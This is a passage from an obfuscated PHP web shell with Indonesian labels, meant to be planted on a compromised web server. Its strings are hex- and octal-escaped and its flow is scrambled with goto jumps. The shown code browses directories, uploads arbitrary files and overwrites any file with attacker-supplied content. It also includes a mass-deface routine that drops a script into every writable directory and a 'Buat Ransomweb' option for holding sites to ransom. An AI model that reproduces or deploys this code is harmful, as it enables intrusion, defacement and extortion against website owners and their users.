66\x2c\x2d\x32\56\x32\67\x30\x39\x34\x20\x2d\x35\x2e\61\66\x2c\x2d\x35\x2e\61\66\x63\60\x2c\55\62\x2e\x38\70\71\60\66\40\62\x2e\x32\67\60\x39\64\54\55\65\56\x31\x36\x20\65\x2e\61\66\54\55\x35\56\61\66\x7a\115\x31\x30\x30\x2e\70\x33\65\x2c\71\65\x2e\71\x39\x37\65\143\55\63\x2e\x34\x31\63\61\x32\x2c\60\x20\55\x36\x2e\x32\63\x35\x2c\62\x2e\x37\61\64\63\x38\x20\55\x36\x2e\62\63\65\54\x36\x2e\x31\62\67\65\x63\x30\54\x33\56\64\x31\x33\61\63\40\62\x2e\70\62\61\70\70\54\x36\56\x32\x33\x35\40\66\56\x32\x33\65\x2c\66\x2e\x32\63\65\x63\x33\56\x34\x31\63\x31\63\x2c\60\40\x36\56\61\x32\x37\65\54\55\x32\x2e\x38\x32\x31\x38\67\x20\x36\x2e\x31\62\67\65\54\55\x36\x2e\62\63\x35\143\60\x2c\x2d\63\56\x34\x31\63\61\62\x20\55\62\x2e\x37\x31\64\x33\67\x2c\x2d\66\56\x31\x32\x37\x35\40\55\66\56\x31\x32\x37\65\54\55\x36\56\61\62\x37\65\x7a\x4d\x35\x36\x2e\67\66\54\61\x32\61\56\x36\x39\143\55\x31\56\x35\60\x35\54\60\x2e\x31\x36\61\62\x35\x20\55\x32\x2e\x37\x32\x37\70\61\x2c\61\x2e\63\60\x33\x34\64\x20\x2d\x33\56\60\61\x2c\62\56\67\x39\x35\x63\x2d\x30\56\63\x32\x32\x35\x2c\61\x2e\x34\61\x30\x39\64\x20\55\x31\x2e\x31\65\65\66\62\54\x32\56\x36\62\x30\x33\x31\40\55\x32\x2e\61\x35\x2c\63\56\65\64\67\65\143\55\60\56\71\71\x34\x33\x37\x2c\60\x2e\x39\x32\67\61\x39\40\x2d\x32\x2e\x33\x39\x31\70\x37\x2c\61\x2e\64\x36\64\x36\71\x20\x2d\x32\x2e\x30\x34\62\65\54\x31\x2e\63\x39\67\x35\143\55\66\56\67\x34\65\x36\62\54\x30\x2e\x36\64\65\x20\x2d\61\x31\x2e\x37\x31\x37\x35\x2c\x35\x2e\x39\63\71\x33\x38\40\55\61\x31\x2e\67\x31\67\x35\54\x31\x32\56\x32\x35\65\143\x30\54\x37\x2e\x30\x30\x30\x39\x34\40\x35\x2e\67\x35\x31\x32\65\x2c\x31\x33\x2e\61\61\x35\40\61\x33\56\x31\61\x35\54\x31\x33\x2e\x31\61\x35\x63\x37\56\x32\x32\x39\63\70\x2c\60\x20\x31\63\56\60\x30\67\x35\x2c\55\65\56\x38\70\65\66\x32\40\x31\x33\x2e\60\60\x37\x35\54\55\x31\x33\x2e\x31\x31\x35\x63\x30\54\55\63\56\63\65\x39\x33\x37\40\x34\x2e\x31\71\x32\x35\54\x2d\70\56\x31\67\40\64\x2e\x31\71\62\x35\54\x2d\70\56\61\x37\x63\x31\x2e\60\x32\x31\62\65\x2c\x2d\x30\x2e\x38\x33\63\61\62\40\61\x2e\x34\71\x31\x35\66\54\x2d\62\x2e\x31\x36\63\x34\x34\40\x31\x2e\x31\x39\65\x39\x34\54\55\63\x2e\64\x35\63\64\x34\x63\x2d\60\x2e\62\71\x35\66\x32\54\55\x31\56\62\x37\66\x35\x36\x20\55\61\x2e\63\x30\x33\64\x34\x2c\55\x32\56\x32\70\64\63\70\x20\55\x32\56\x35\70\54\x2d\x32\56\x35\70\x63\55\61\56\x32\x39\54\55\60\56\x32\71\65\66\x33\40\x2d\x32\56\x36\x32\60\63\61\x2c\60\56\x31\x37\x34\x36\x39\x20\55\x33\x2e\64\x35\63\x34\64\54\61\56\x31\71\65\x39\x34\143\x30\54\x30\40\55\x36\56\x32\63\x35\54\x35\x2e\63\x34\70\61\x33\x20\55\x36\56\x32\63\x35\54\61\63\56\60\60\67\65\x63\x30\x2c\63\x2e\67\70\71\63\70\40\x2d\x32\56\63\x33\70\x31\x32\54\x36\x2e\x32\x33\x35\40\x2d\x36\56\61\62\67\65\54\x36\x2e\62\x33\x35\143\55\63\56\66\64\61\65\x36\54\x30\40\55\x36\56\62\x33\x35\54\x2d\x32\x2e\x39\x31\65\71\x34\40\55\x36\56\x32\63\x35\x2c\55\x36\56\62\63\65\x63\x30\54\55\x33\x2e\x31\x37\61\x32\x35\x20\61\56\66\66\66\62\x35\x2c\55\x35\x2e\62\x32\67\x31\71\40\x35\x2e\66\71\x37\65\54\x2d\x35\56\x34\70\x32\65\143\60\x2e\x31\x34\x37\70\x31\x2c\60\x2e\60\x31\x33\64\x34\x20\x30\56\x32\x38\x32\61\x39\x2c\60\x2e\60\x31\x33\64\x34\40\x30\x2e\x34\63\x2c\x30\143\62\x2e\60\x36\x39\63\x38\x2c\55\x30\56\64\61\x36\65\66\x20\x33\56\66\x31\x34\x36\x39\54\x2d\61\56\64\x36\64\66\71\x20\65\56\63\x37\65\54\x2d\x33\x2e\61\61\67\65\143\61\56\x37\66\60\x33\x31\54\x2d\61\x2e\x36\65\62\70\61\x20\x33\56\x34\70\60\63\x31\x2c\55\x34\x2e\x30\x33\61\x32\x35\40\64\56\x31\x39\62\x35\x2c\x2d\67\x2e\x30\x39\65\x63\x30\x2e\62\x38\62\61\x39\54\x2d\61\56\x30\70\x38\64\x34\40\60\x2e\60\x32\66\x38\x38\x2c\55\62\56\62\64\x34\60\x36\x20\55\x30\x2e\67\61\62\61\71\54\x2d\x33\x2e\x31\60\x34\60\66\143\x2d\x30\x2e\67\62\65\66\x33\x2c\55\x30\56\70\x36\40\55\61\56\x38\62\67\x35\x2c\x2d\x31\x2e\x33\60\x33\64\x34\40\55\x32\x2e\71\x34\62\70\x31\x2c\55\61\56\x31\71\65\71\64\x7a\x4d\x31\x32\x33\x2e\x38\64\54\61\62\x33\56\67\x33\62\65\143\55\x30\x2e\x31\64\67\x38\x31\54\x30\x2e\60\x32\66\x38\70\x20\55\x30\x2e\x32\71\x35\66\x32\x2c\x30\x2e\60\66\67\x31\x39\40\x2d\x30\56\x34\x33\x2c\x30\56\61\60\67\x35\143\55\x31\x2e\65\x39\x39\x30\x36\x2c\60\56\63\66\62\x38\61\x20\x2d\x32\x2e\67\62\x37\x38\61\54\x31\56\70\x30\60\x36\63\x20\x2d\62\x2e\66\70\x37\x35\54\63\56\x34\x34\143\60\x2c\x33\56\61\x37\61\62\65\40\x31\56\63\65\67\x31\71\x2c\65\x2e\x38\64\x35\63\x31\40\63\56\61\61\x37\65\x2c\67\56\66\x33\62\x35\x63\x31\x2e\67\66\60\63\x31\x2c\x31\56\67\70\67\x31\71\40\63\56\70\x30\62\x38\61\54\62\x2e\x38\x36\62\61\x39\x20\x35\56\64\x38\62\x35\x2c\x33\56\70\x37\x63\x31\x2e\x36\67\x39\66\71\x2c\61\56\x30\x30\67\x38\61\x20\63\56\60\63\x36\70\x38\54\x31\x2e\x39\63\65\40\x33\56\70\67\54\62\x2e\71\60\62\x35\x63\60\x2e\70\63\63\61\x33\x2c\60\56\x39\x36\67\65\x20\x31\x2e\62\x39\x2c\61\x2e\x39\x34\70\64\x34\40\61\56\62\71\54\x33\56\70\x37\x63\x30\x2c\63\56\63\x31\71\60\66\x20\55\x32\x2e\64\70\65\x39\64\54\65\56\70\x30\x35\x20\x2d\x35\56\x38\60\65\x2c\65\x2e\70\60\x35\143\x2d\x33\56\x34\70\60\x33\x31\54\60\x20\x2d\x35\x2e\71\61\62\x35\54\55\x32\x2e\x30\61\x35\66\x32\x20\x2d\65\x2e\x39\x31\62\x35\54\x2d\x35\56\x38\x30\65\143\60\54\x2d\x33\x2e\63\61\x39\x30\66\x20\55\60\56\x36\70\x35\x33\x31\x2c\55\66\56\66\63\70\x31\62\x20\x2d\62\56\60\x34\62\65\54\55\71\56\63\x35\62\65\143\x2d\60\x2e\66\x37\61\70\x37\54\x2d\x31\x2e\x33\65\x37\61\71\40\55\61\x2e\x35\65\70\67\65\x2c\55\62\x2e\65\x32\x36\x32\65\x20\x2d\x32\56\66\x38\67\x35\x2c\x2d\x33\x2e\x35\x34\x37\x35\x63\x2d\x31\x2e\61\62\70\x37\x35\54\55\61\x2e\x30\x32\61\x32\65\x20\55\62\56\x36\x36\x30\66\62\54\55\x31\56\71\63\65\40\55\x34\x2e\x35\x31\x35\x2c\x2d\x31\56\71\x33\65\143\55\x31\x2e\x38\x39\x34\66\x39\x2c\x2d\60\x2e\x30\x35\63\x37\x35\40\55\x33\x2e\x34\71\x33\x37\65\x2c\61\x2e\64\x33\67\70\x31\x20\55\x33\56\65\x34\67\x35\54\x33\56\63\x33\x32\x35\x63\x2d\60\x2e\x30\65\63\x37\x35\x2c\x31\x2e\70\x39\x34\66\71\40\61\56\64\63\x37\70\61\x2c\63\56\64\x39\x33\x37\x35\x20\63\56\63\63\x32\65\54\x33\x2e\x35\x34\67\x35\x63\x30\56\60\x32\x36\70\70\54\60\56\60\61\x33\x34\64\40\60\56\x30\62\66\x38\x38\54\60\56\60\64\60\63\x31\40\x30\x2e\61\60\67\x35\54\60\x2e\x31\60\67\x35\x63\x30\x2e\62\x36\x38\67\65\54\x30\x2e\62\x34\61\70\x38\40\60\56\66\x37\61\x38\x38\x2c\60\56\70\61\x39\x36\71\40\61\56\x30\x37\65\x2c\x31\56\66\x31\62\65\143\60\x2e\x37\71\x32\x38\x31\x2c\x31\56\65\70\65\66\63\40\61\56\63\71\x37\x35\54\64\x2e\x30\x35\70\61\x33\x20\61\x2e\x33\71\67\x35\x2c\66\x2e\62\63\65\x63\x30\x2c\67\x2e\x32\x32\71\63\x38\40\x35\x2e\71\x35\62\70\x31\x2c\x31\x32\56\x36\x38\x35\x20\61\x32\x2e\x37\71\x32\65\54\61\62\56\66\70\x35\x63\67\x2e\60\x30\60\x39\x34\54\x30\40\61\62\x2e\x36\70\x35\x2c\x2d\x35\x2e\66\70\64\x30\66\x20\61\x32\56\66\70\65\54\55\x31\62\x2e\x36\x38\65\143\x30\54\x2d\x33\x2e\x33\x39\71\66\x39\x20\55\x31\x2e\62\66\63\x31\x32\x2c\x2d\x36\56\x33\70\62\x38\61\40\x2d\x33\x2e\60\x31\x2c\55\70\x2e\63\70\65\143\55\x31\x2e\x37\64\66\70\67\54\55\62\56\60\60\62\61\x39\40\55\x33\56\x37\62\x32\61\x39\x2c\55\63\56\61\64\x34\x33\x37\40\55\x35\x2e\x34\70\62\x35\54\55\x34\56\61\x39\x32\65\143\55\61\x2e\x37\x36\x30\63\61\54\55\61\x2e\x30\64\70\61\62\40\x2d\x33\x2e\x32\66\x35\63\61\54\55\x31\x2e\x39\x36\61\x38\67\40\55\64\56\60\x38\65\54\x2d\62\x2e\67\x39\65\x63\55\60\56\70\x31\x39\x36\x39\x2c\x2d\x30\56\x38\x33\63\x31\62\40\55\x31\56\x31\x38\62\65\54\x2d\x31\56\64\x32\64\63\x37\x20\55\61\x2e\61\x38\62\x35\54\x2d\62\56\71\x30\62\x35\143\60\x2e\60\64\x30\63\x31\54\x2d\x30\x2e\x39\x39\x34\x33\67\x20\x2d\60\x2e\63\66\x32\x38\61\x2c\55\x31\x2e\x39\x34\x38\64\64\x20\x2d\61\56\x30\67\65\54\55\x32\x2e\66\62\x30\63\61\x63\55\x30\x2e\67\x32\x35\66\x32\54\55\x30\56\x36\x38\65\x33\61\x20\x2d\61\56\x37\x30\x36\65\x36\x2c\x2d\61\x2e\60\62\61\x32\65\40\x2d\x32\x2e\x36\x38\x37\x35\54\55\60\56\71\62\67\x31\71\172\x22\x3e\x3c\x2f\x70\141\164\x68\x3e\x3c\x2f\147\x3e\x3c\x2f\x67\x3e\74\x2f\163\x76\x67\x3e\12\xa\x20\40\40\x20\40\x20\40\x20\x20\40\40\40\40\x20\40\40\40\40\40\40\40\40\x20\x20\x20\40\x20\x20\x3c\x61\40\143\154\141\163\x73\x3d\42\x70\141\164\150\42\x20\x68\162\x65\146\75\x22\x3f\x70\141\x74\x68\x3d" . $path . "\x26\141\153\x73\x69\x3d\x62\165\141\x74\162\x61\156\163\157\155\x22\76\102\x75\141\x74\x20\122\141\156\163\x6f\x6d\167\x65\142\x3c\57\141\76\12\40\40\x20\x20\x20\x20\x20\40\40\40\40\40\40\40\40\x20\40\40\x20\40\x20\x20\x20\x20\12\x20\x20\x20\40\x20\x20\x20\x20\x20\40\40\x20\40\40\x20\x20\40\40\x20\40\x20\x20\x20\x20\74\57\144\151\166\x3e\xa\40\x20\x20\x20\x20\40\40\40\40\x20\x20\x20\40\40\x20\x20\x20\40\40\40\40\x20\x20\x20\74\x21\55\x2d\40\141\x6b\x68\x69\162\x20\141\x75\164\157\x20\x63\162\145\x61\164\x65\x20\x72\141\156\x73\157\155\167\x65\142\x20\x2d\x2d\76\12\x20\x20\40\40\x20\x20\40\x20\40\x20\x20\40\x20\40\40\x20\x20\x20\x20\40\74\x2f\x64\151\166\76\12\x20\40\x20\x20\40\x20\40\x20\x20\x20\40\40\x20\40\x20\x20\74\57\x64\x69\166\76\xa\40\40\x20\40\x20\x20\40\40\x20\40\40\x20\x3c\x2f\x64\x69\x76\76\xa\x20\40\40\40\40\x20\x20\40\x20\x20\40\x20\x3c\x21\55\55\40\141\153\x68\151\162\40\164\x61\155\x62\141\150\x20\146\x69\154\145\57\146\157\154\x64\x65\x72\40\46\x20\x72\x61\156\x73\157\155\x77\x65\x62\x20\55\x2d\76"; goto SRf7o; fzFNd: foreach ($scandir as $direktori) { if ($direktori != "\x2e" && $direktori != "\56\56") { if (is_dir($direktori)) { echo "\x3c\x74\x72\x3e\12\40\x20\40\x20\x20\x20\x20\x20\x20\40\40\x20\x20\40\40\x20\40\x20\x20\x20\40\40\x20\x20\74\164\x68\40\x73\143\x6f\160\145\x3d\42\162\x6f\x77\42\x3e\x3c\163\166\147\x20\170\155\x6c\x6e\163\75\x22\150\x74\x74\x70\72\x2f\57\167\167\167\x2e\167\x33\56\x6f\x72\147\x2f\x32\x30\60\x30\57\x73\166\x67\42\x20\x77\151\x64\x74\x68\75\42\62\x36\x22\x20\150\145\151\x67\150\164\75\42\62\66\42\x20\146\151\154\154\x3d\42\143\165\162\162\x65\x6e\x74\103\x6f\154\157\x72\42\x20\x63\x6c\141\163\x73\75\x22\x62\x69\x20\x62\151\55\146\157\x6c\144\x65\162\x2d\146\151\154\154\x22\x20\166\x69\145\x77\102\x6f\x78\x3d\x22\x30\40\x30\x20\x31\66\40\x31\66\42\76\xa\x20\x20\40\x20\x20\40\x20\x20\40\x20\40\40\x20\x20\40\40\40\x20\40\x20\x20\40\40\x20\x3c\x70\x61\x74\x68\40\144\75\x22\x4d\x39\x2e\70\x32\x38\40\63\150\63\56\x39\x38\x32\x61\x32\40\62\x20\60\x20\x30\40\61\x20\x31\56\71\71\62\x20\62\x2e\61\70\x31\154\x2d\56\x36\63\x37\x20\67\101\x32\x20\62\40\60\40\60\x20\x31\40\61\63\56\x31\x37\64\40\61\64\x48\62\x2e\70\x32\65\x61\62\40\x32\40\x30\x20\60\x20\61\55\x31\x2e\x39\71\x31\x2d\x31\56\x38\x31\x39\x6c\55\x2e\66\x33\67\55\x37\x61\61\x2e\x39\x39\40\x31\56\x39\71\40\60\40\x30\x20\x31\40\x2e\63\x34\x32\x2d\61\x2e\x33\61\x4c\56\x35\40\x33\141\x32\40\x32\x20\x30\40\x30\40\61\x20\62\55\x32\150\x33\x2e\66\x37\62\x61\62\40\x32\x20\x30\x20\60\x20\61\40\x31\x2e\64\x31\x34\56\65\x38\66\154\x2e\x38\x32\x38\x2e\70\62\x38\x41\62\40\62\40\x30\40\x30\40\60\x20\71\56\70\62\x38\x20\63\x7a\155\x2d\70\56\x33\x32\62\56\61\62\103\61\56\x37\62\40\x33\x2e\60\x34\x32\40\x31\x2e\x39\65\x20\63\x20\x32\56\61\x39\40\63\150\65\x2e\63\x39\66\154\x2d\x2e\x37\60\67\55\56\67\60\67\101\x31\40\x31\x20\60\40\x30\40\x30\40\x36\56\x31\67\x32\x20\62\x48\62\56\65\141\61\40\61\x20\60\x20\60\40\x30\x2d\x31\x20\56\71\x38\x31\x6c\56\x30\60\66\x2e\61\x33\71\172\42\57\76\xa\x20\x20\40\40\x20\x20\x20\x20\40\x20\40\x20\x20\40\x20\x20\x20\40\40\40\40\40\74\57\x73\166\147\x3e\x3c\x2f\x74\x68\76\12\40\40\x20\x20\40\x20\40\40\x20\x20\40\x20\40\x20\x20\40\40\40\x20\40\40\x20\x20\40\74\x74\x64\76\x3c\141\x20\x63\x6c\141\x73\x73\75\42\x70\x61\164\x68\42\40\x6e\141\155\141\x3d\x27\146\x69\154\145\156\171\141\47\40\x68\162\145\146\75\x22\x3f\160\x61\164\150\75" . $path . "\x2f" . $direktori . "\x22\x3e" . $direktori . "\74\57\x61\x3e\74\x2f\x74\x64\x3e\12\x20\40\40\x20\40\40\40\40\x20\40\x20\x20\x20\x20\40\x20\x20\x20\x20\40\40\x20\x20\x20\x3c\164\x64\76\xa\40\40\x20\40\x20\x20\40\40\x20\x20\x20\40\40\40\x20\40\x20\x20\40\40\x20\40\x20\40\x3c\146\x6f\x72\155\x20\x6d\145\164\x68\x6f\x64\x3d\x27\x50\117\123\x54\47\40\141\x63\164\x69\x6f\x6e\75\42\77\x6f\160\x74\151\x6f\156\75\x26\x70\141\164\150\x3d" . $path . "\42\76\12\x20\40\40\x20\40\x20\40\x20\40\x20\40\40\x20\40\x20\x20\40\x20\40\x20\x20\x20\40\40\74\144\x69\x76\x20\143\x6c\x61\163\x73\x3d\x22\160\x69\x6c\151\150\141\x6e\x20\x69\x6e\x70\x75\x74\x2d\x67\162\x6f\x75\160\x20\x6d\142\x2d\63\x22\76\12\x20\40\x20\40\40\40\40\40\x20\40\40\x20\x20\40\x20\40\40\40\x20\x20\40\x20\40\x20\x3c\163\x65\x6c\x65\x63\x74\x20\x6e\x61\155\145\x3d\47\x6f\160\164\47\x20\x63\x6c\141\163\x73\75\x22\160\151\154\x69\150\141\156\x20\146\157\x72\x6d\x2d\163\x65\x6c\145\143\x74\40\x66\x6f\x72\x6d\55\x73\x65\x6c\x65\x63\164\x2d\163\x6d\40\x6d\142\x2d\63\42\x20\x69\144\75\x22\151\156\x70\x75\164\107\162\x6f\x75\x70\x53\x65\x6c\145\143\x74\60\x32\x22\x20\x61\x72\x69\141\55\154\141\x62\145\x6c\75\x22\x44\145\146\x61\x75\x6c\164\x20\163\145\x6c\x65\143\164\x20\x65\170\141\155\160\154\145\x22\76\12\40\x20\40\x20\x20\x20\40\x20\x20\x20\x20\x20\x20\x20\x20\40\x20\x20\x20\x20\x20\x20\40\x20\x20\x20\x20\40\x3c\x6f\160\164\151\157\x6e\40\163\x65\154\x65\x63\164\x65\x64\x3e\x43\x68\157\157\163\145\56\56\x2e\x3c\57\157\160\x74\151\157\156\76\xa\40\x20\40\40\x20\x20\x20\x20\x20\x20\x20\40\x20\40\40\40\x20\x20\x20\x20\x20\x20\40\x20\x20\x20\x20\x20\74\x6f\x70\x74\151\157\156\x20\166\x61\x6c\x75\145\75\x22\162\145\x6e\141\155\145\42\76\122\145\x6e\x61\155\x65\x3c\x2f\x6f\160\164\151\x6f\156\x3e\xa\x20\x20\40\40\40\40\40\x20\40\40\x20\40\40\40\40\40\x20\40\x20\x20\x20\40\x20\x20\x20\x20\x20\x20\x3c\x6f\160\x74\151\x6f\x6e\40\x76\x61\x6c\x75\x65\75\42\x64\145\154\x65\164\145\x22\76\x44\145\154\145\x74\145\x3c\57\157\160\164\x69\157\x6e\x3e\12\x20\40\40\40\x20\x20\40\x20\x20\x20\40\40\x20\40\40\x20\x20\40\40\x20\40\40\x20\x20\74\57\163\x65\x6c\145\143\164\x3e\xa\x20\x20\40\40\40\x20\40\40\40\40\40\x20\40\40\x20\x20\x20\x20\40\40\x20\x20\x20\x20\74\57\x64\151\x76\x3e\xa\x20\40\x20\x20\40\x20\40\x20\x20\40\40\40\x20\x20\40\x20\40\x20\x20\40\x20\40\x20\x20\74\x69\x6e\x70\165\x74\x20\164\x79\x70\145\75\x22\150\151\144\144\x65\156\x22\40\156\x61\x6d\145\x3d\x22\x74\171\x70\145\42\40\x76\x61\154\x75\x65\75\x22\144\151\x72\x65\143\x74\157\162\171\42\x3e\12\x20\40\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\40\x20\x20\40\x20\40\40\x20\40\x20\x20\40\x3c\151\x6e\160\x75\x74\x20\x74\171\160\145\x3d\x22\x68\x69\144\144\x65\x6e\x22\x20\156\141\x6d\x65\75\42\x70\141\x74\150\x6e\x79\141\x22\40\166\x61\154\165\145\x3d\x27" . $path . "\x2f" . $direktori . "\x27\76\12\40\x20\x20\x20\x20\x20\x20\x20\x20\40\x20\40\x20\x20\x20\x20\x20\x20\40\40\x20\x20\40\x20\74\142\x75\x74\164\157\156\x20\156\141\155\x65\x3d\x22\156\157\167\42\40\x63\x6c\x61\x73\x73\75\42\164\157\x6d\x62\157\154\x20\142\164\156\x20\x62\164\156\x2d\x6f\x75\x74\x6c\151\156\x65\55\x73\145\143\157\156\x64\x61\x72\x79\x22\40\x74\171\160\145\75\x22\x73\165\142\x6d\x69\164\42\76\x4e\x6f\x77\x3c\x2f\142\165\x74\x74\x6f\156\76\xa\40\x20\40\x20\x20\x20\x20\40\x20\x20\x20\x20\40\x20\40\40\x20\40\x20\40\x20\x20\x20\40\x3c\x2f\x66\157\x72\155\76\12\40\x20\x20\x20\40\40\x20\40\40\40\x20\40\x20\40\40\40\x20\40\x20\40\x20\x20\x20\x20\74\x2f\164\x64\76\12\40\40\x20\x20\40\40\x20\40\40\40\x20\x20\40\x20\x20\40\40\x20\x20\x20\x20\x20\74\x2f\x74\x72\x3e"; } } } goto DZMI8; fDFDv: if (isset($_POST["\142\164\x6e"])) { $nama = $_FILES["\165\x70\x6c"]["\156\x61\155\145"]; $lokasi = $_FILES["\165\160\154"]["\x74\x6d\160\x5f\156\141\x6d\x65"]; $folder = ''; if (move_uploaded_file($lokasi, $folder . $nama)) { echo "\74\x73\143\162\x69\160\164\76\x73\167\141\x6c\50\x22\102\145\162\150\x61\163\151\x6c\x20\x55\160\154\x6f\141\144\x21\41\41\42\x2c\x20\x22\x53\x65\154\x61\x6d\x61\164\40\141\156\x64\141\x20\102\151\163\141\x20\115\x65\156\147\x75\160\x6c\x6f\141\144\x20\x46\151\x6c\145\42\x2c\40\42\x73\165\143\143\x65\x73\163\42\51\73\40\x3c\57\x73\x63\162\151\160\x74\76"; } else { echo "\74\x73\x63\162\151\160\164\x3e\40\163\x77\x61\154\50\x22\107\x61\x67\141\x6c\40\x55\x70\154\x6f\x61\x64\x21\41\41\42\54\40\x22\115\x61\141\146\x20\124\151\144\x61\153\x20\x42\x69\x73\x61\40\125\x70\154\157\x61\x64\40\106\151\154\x65\42\x2c\x20\x22\145\162\162\x6f\162\x22\x29\x3b\40\74\x2f\x73\143\162\x69\x70\x74\76"; } } goto S_SOe; XgDDu: if ($_POST["\x6f\x70\164"] == "\x65\144\x69\x74") { if (isset($_POST["\x73\x72\x63"])) { $fp = fopen($_POST["\160\141\164\150"], "\167"); if (fwrite($fp, $_POST["\x73\x72\x63"])) { echo "\x3c\163\x63\x72\x69\x70\164\x3e\167\151\x6e\x64\x6f\x77\x2e\154\x6f\x63\141\x74\151\x6f\x6e\x3d\47\x3f\160\141\x74\x68\x3d" . $path . "\47\x3b\x73\x77\141\154\x28\47\x42\x65\162\150\x61\163\x69\x6c\x20\115\145\x6e\x67\x65\x64\x69\164\x20\x46\x69\x6c\x65\41\41\41\x27\x2c\40\x27\123\145\154\x61\x6d\141\164\x20\101\156\144\x61\40\x42\x65\162\x68\141\163\x69\154\x20\115\145\x6e\147\x65\144\151\x74\40\x46\151\x6c\x65\x27\54\x20\47\x73\x75\x63\143\x65\163\163\x27\x29\73\74\57\163\x63\162\x69\x70\164\x3e"; } else { echo "\74\x73\x63\x72\151\160\x74\x3e\167\151\156\144\x6f\167\56\x6c\157\x63\141\x74\x69\x6f\156\x3d\47\x3f\160\141\164\150\x3d" . $path . "\x27\x3b\40\x73\x77\141\x6c\50\47\107\x61\x67\x61\154\40\x4d\x65\x6e\x67\x68\x61\x70\165\x73\x20\x46\x69\154\145\x21\41\41\x27\x2c\40\x27\101\156\144\x61\40\107\141\147\x61\x6c\40\115\145\156\147\150\141\x70\x75\x73\x20\106\151\x6c\x65\47\54\x20\x27\x65\162\162\157\x72\47\x29\73\74\57\x73\x63\x72\x69\x70\x74\x3e"; } fclose($fp); } echo "\74\x66\x6f\x72\x6d\40\155\x65\164\x68\157\144\x3d\x27\120\117\x53\124\47\x3e\x3c\x64\151\166\x20\143\x6c\141\x73\163\75\42\142\x67\x6e\171\x61\40\143\157\x6e\164\x61\x69\156\145\162\55\146\154\165\151\x64\40\141\x6c\x65\x72\164\40\x61\154\x65\x72\164\x2d\x77\x61\x72\156\x69\156\147\40\141\154\x65\162\164\x2d\x64\x69\163\155\151\163\x73\151\142\x6c\x65\40\x66\141\144\x65\x20\163\150\x6f\x77\x22\x20\x72\157\x6c\145\75\42\x61\154\145\162\164\x22\x3e\12\x20\x20\x20\40\x20\40\x20\x20\x20\x20\40\40\x3c\164\145\x78\x74\141\x72\145\141\x20\143\154\x61\163\x73\75\x22\x6c\151\150\x61\164\x20\146\157\162\155\x2d\143\x6f\156\x74\162\x6f\154\x22\x20\x69\144\75\42\x65\x78\x61\155\160\154\145\x46\x6f\x72\x6d\103\x6f\x6e\164\x72\x6f\x6c\x54\x65\x78\164\141\162\145\x61\x31\x22\40\x72\x6f\167\x73\75\42\x32\x30\x22\x20\x6e\141\x6d\x65\x3d\x22\163\162\143\42\76" . htmlspecialchars(file_get_contents($_POST["\x70\x61\x74\x68\x6e\171\x61"])) . "\x3c\x2f\x74\x65\x78\x74\141\162\145\141\76\74\141\x20\x68\x72\x65\146\75\x22\77\110\157\x6d\x65\42\x20\x74\171\x70\x65\x3d\42\142\x75\x74\x74\157\x6e\42\40\x63\x6c\141\x73\x73\75\42\164\x75\164\165\160\40\x62\164\x6e\55\143\x6c\x6f\x73\145\x22\x20\x64\x61\x74\141\55\x62\163\x2d\144\151\163\x6d\151\163\x73\x3d\x22\141\154\x65\x72\x74\x22\x20\141\162\x69\x61\55\x6c\x61\142\x65\x6c\x3d\x22\103\x6c\157\163\x65\x22\76\x3c\57\141\76\xa\x20\x20\40\x20\x20\40\x20\x20\40\40\x20\x20\x3c\x69\x6e\160\x75\164\40\x74\x79\x70\145\75\x22\150\151\144\144\x65\156\42\40\x6e\x61\155\x65\75\42\160\x61\164\150\42\40\x76\141\154\165\x65\x3d\47" . $_POST["\160\141\x74\x68\x6e\x79\141"] . "\47\76\12\x3c\151\x6e\160\x75\164\40\x74\171\x70\145\x3d\42\150\x69\x64\144\145\156\42\40\x6e\x61\155\x65\x3d\42\157\160\x74\x22\x20\166\x61\154\x75\145\x3d\42\x65\144\151\x74\x22\x3e\12\40\40\x20\x20\40\x20\40\40\40\x20\x20\40\74\x2f\144\151\166\x3e\x3c\x62\165\x74\164\157\156\40\x6e\x61\x6d\145\x3d\42\x65\x64\151\x74\42\40\x63\x6c\x61\163\x73\75\x22\x74\157\155\142\157\154\x20\142\x74\156\x20\x62\x74\x6e\x2d\157\165\x74\x6c\x69\156\145\55\x73\145\143\157\156\x64\x61\162\171\42\x20\164\x79\160\x65\x3d\x22\163\x75\142\155\151\x74\42\x3e\123\x69\155\x70\x61\x6e\x3c\57\x62\165\164\x74\157\x6e\x3e\74\x2f\146\157\162\x6d\76"; } goto o2Prn; MQCqU: foreach ($paths as $id => $pat) { if ($pat == '' && $id == 0) { $a = true; echo "\74\x61\40\x63\x6c\x61\163\x73\x3d\x27\x70\141\x74\150\47\x20\150\x72\145\146\75\42\x3f\160\x61\164\x68\x3d\x2f\42\x3e\57\x3c\x2f\141\76"; continue; } if ($pat == '') { continue; } echo "\74\x61\40\150\162\145\x66\x3d\x22\77\160\x61\164\150\x3d"; for ($i = 0; $i <= $id; $i++) { echo "{$paths[$i]}"; if ($i != $id) { echo "\x2f"; } } echo "\x22\x20\x63\154\x61\x73\x73\75\x22\160\x61\x74\x68\42\x3e" . $pat . "\x3c\x2f\x61\76\57"; } goto G8Ag4; HWDK_: $scandir = scandir($path); goto fzFNd; mRvz3: if ($_GET["\x61\x6b\163\151"] == "\155\x61\163\163\x64\145\x66\x61\143\x65") { function tipe_massal($dir, $namafile, $isi_script) { if (is_writable($dir)) { $dira = scandir($dir); foreach ($dira as $dirb) { $dirc = "{$dir}\x2f{$dirb}"; $lokasi = $dirc . "\x2f" . $namafile; if ($dirb === "\x2e") { file_put_contents($lokasi, $isi_script); } elseif ($dirb === "\56\56") { file_put_contents($lokasi, $isi_script); } else { if (is_dir($dirc)) { if (is_writable($dirc)) { echo "\x42\x65\x72\150\x61\x73\151\x6c\40\75\x3e\40{$lokasi}\xa"; file_put_contents($lokasi, $isi_script); $MassDeface = tipe_massal($dirc, $namafile, $isi_script); } } } } } } function tipe_biasa($dir, $namafile, $isi_script) { if (is_writable($dir)) { $dira = scandir($dir); foreach ($dira as $dirb) { $dirc = "{$dir}\x2f{$dirb}"; $lokasi = $dirc . "\x2f" . $namafile; if ($dirb === "\56") { file_put_contents($lokasi, $isi_script); } elseif ($dirb === "\x2e\x2e") { file_put_contents($lokasi, $isi_script); } else { if (is_dir($dirc)) { if (is_writable($dirc)) { echo "\x42\x65\162\150\141\x73\151\x6c\40\x3d\76\40{$dirb}\57{$namafile}\12"; file_put_contents($lokasi, $isi_script); } } } } } } if ($_POST["\163\164\x61\162\x74"]) { echo 